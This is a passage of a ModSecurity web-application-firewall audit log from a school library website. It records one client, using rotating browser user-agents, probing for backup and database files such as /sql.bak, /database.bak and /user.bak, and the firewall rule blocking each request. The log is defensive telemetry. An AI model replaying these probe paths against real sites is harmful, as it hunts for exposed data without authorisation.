p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d128f5d-Z-- --9b5b206d-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo8AAAAAU 103.236.140.4 33756 103.236.140.4 8181 --9b5b206d-B-- GET /archive.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227082 --9b5b206d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9b5b206d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227083270 2047 (- - -) Stopwatch2: 1747683227083270 2047; combined=795, p1=387, p2=374, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b5b206d-Z-- --c5ad2b6a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo8QAAABQ 103.236.140.4 33902 103.236.140.4 8181 --c5ad2b6a-B-- GET /sql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 OPR/56.0.3051.104 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871823 --c5ad2b6a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c5ad2b6a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227084441 1796 (- - -) Stopwatch2: 1747683227084441 1796; combined=724, p1=344, p2=352, p3=0, p4=0, p5=27, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5ad2b6a-Z-- --b054c229-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo8gAAABM 103.236.140.4 33902 103.236.140.4 8181 --b054c229-B-- GET /dat.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0.1) Gecko/20100101 Firefox/61.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167805040 --b054c229-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b054c229-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227092655 1524 (- - -) Stopwatch2: 1747683227092655 1524; combined=602, p1=304, p2=272, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b054c229-Z-- --4e65816a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo8wAAAAc 103.236.140.4 33902 103.236.140.4 8181 --4e65816a-B-- GET /tar.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227095 --4e65816a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4e65816a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227095786 1780 (- - -) Stopwatch2: 1747683227095786 1780; combined=654, p1=317, p2=304, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e65816a-Z-- --ae61951a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo9AAAABE 103.236.140.4 33756 103.236.140.4 8181 --ae61951a-B-- GET /user.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167805045 --ae61951a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ae61951a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227096839 1551 (- - -) Stopwatch2: 1747683227096839 1551; combined=606, p1=301, p2=279, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae61951a-Z-- --93eea568-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo9wAAAA8 103.236.140.4 33902 103.236.140.4 8181 --93eea568-B-- GET /database.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871832 --93eea568-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --93eea568-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227113400 1856 (- - -) Stopwatch2: 1747683227113400 1856; combined=635, p1=305, p2=305, p3=0, p4=0, p5=25, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93eea568-Z-- --5a20b313-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo-AAAABY 103.236.140.4 33902 103.236.140.4 8181 --5a20b313-B-- GET /old.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227121 --5a20b313-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5a20b313-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227125753 1572 (- - -) Stopwatch2: 1747683227125753 1572; combined=633, p1=308, p2=298, p3=0, p4=0, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a20b313-Z-- --0ecc3f07-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo-QAAABA 103.236.140.4 33902 103.236.140.4 8181 --0ecc3f07-B-- GET /2015.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6; rv:60.3.0) Gecko/20100101 Firefox/60.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182455 --0ecc3f07-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0ecc3f07-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227129810 1554 (- - -) Stopwatch2: 1747683227129810 1554; combined=600, p1=301, p2=272, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ecc3f07-Z-- --39a55a58-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo-wAAAAE 103.236.140.4 33902 103.236.140.4 8181 --39a55a58-B-- GET /smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871869 --39a55a58-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --39a55a58-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227143373 1597 (- - -) Stopwatch2: 1747683227143373 1597; combined=668, p1=315, p2=327, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a55a58-Z-- --9473526a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo_QAAAAs 103.236.140.4 33756 103.236.140.4 8181 --9473526a-B-- GET /127.0.0.1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127995032 --9473526a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9473526a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".0.0.1.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227163721 1913 (- - -) Stopwatch2: 1747683227163721 1913; combined=715, p1=348, p2=338, p3=0, p4=0, p5=28, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9473526a-Z-- --daf68c5f-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopAgAAAAM 103.236.140.4 33760 103.236.140.4 8181 --daf68c5f-B-- GET /smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.2.1) Gecko/20100101 Firefox/52.2.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182489 --daf68c5f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --daf68c5f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227636626 2724 (- - -) Stopwatch2: 1747683227636626 2724; combined=987, p1=322, p2=626, p3=0, p4=0, p5=38, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daf68c5f-Z-- --7552ad4c-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopBAAAAAg 103.236.140.4 33760 103.236.140.4 8181 --7552ad4c-B-- GET /joomla.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182503 --7552ad4c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7552ad4c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227664366 1868 (- - -) Stopwatch2: 1747683227664366 1868; combined=670, p1=333, p2=309, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7552ad4c-Z-- --43230106-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopBwAAABQ 103.236.140.4 33760 103.236.140.4 8181 --43230106-B-- GET /jsp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871898 --43230106-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --43230106-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227694830 2245 (- - -) Stopwatch2: 1747683227694830 2245; combined=825, p1=478, p2=319, p3=0, p4=0, p5=27, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43230106-Z-- --40f4ff0c-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopCQAAAAc 103.236.140.4 34838 103.236.140.4 8181 --40f4ff0c-B-- GET /error_log.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.4.1) Gecko/20100101 Firefox/52.4.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227142 --40f4ff0c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --40f4ff0c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227729473 2538 (- - -) Stopwatch2: 1747683227729473 2538; combined=842, p1=345, p2=464, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40f4ff0c-Z-- --699afc06-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopCgAAABE 103.236.140.4 34838 103.236.140.4 8181 --699afc06-B-- GET /db.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182512 --699afc06-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --699afc06-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227737231 1693 (- - -) Stopwatch2: 1747683227737231 1693; combined=723, p1=379, p2=317, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --699afc06-Z-- --d4341c7d-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopCwAAAAo 103.236.140.4 34838 103.236.140.4 8181 --d4341c7d-B-- GET /sales.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182519 --d4341c7d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d4341c7d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227749820 2322 (- - -) Stopwatch2: 1747683227749820 2322; combined=810, p1=374, p2=408, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4341c7d-Z-- --4eeda311-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopDAAAAAw 103.236.140.4 34838 103.236.140.4 8181 --4eeda311-B-- GET /2014.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 OPR/55.0.2994.47 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182530 --4eeda311-F-- HTTP/1.1 403 Forbidden X-Frame-Options: 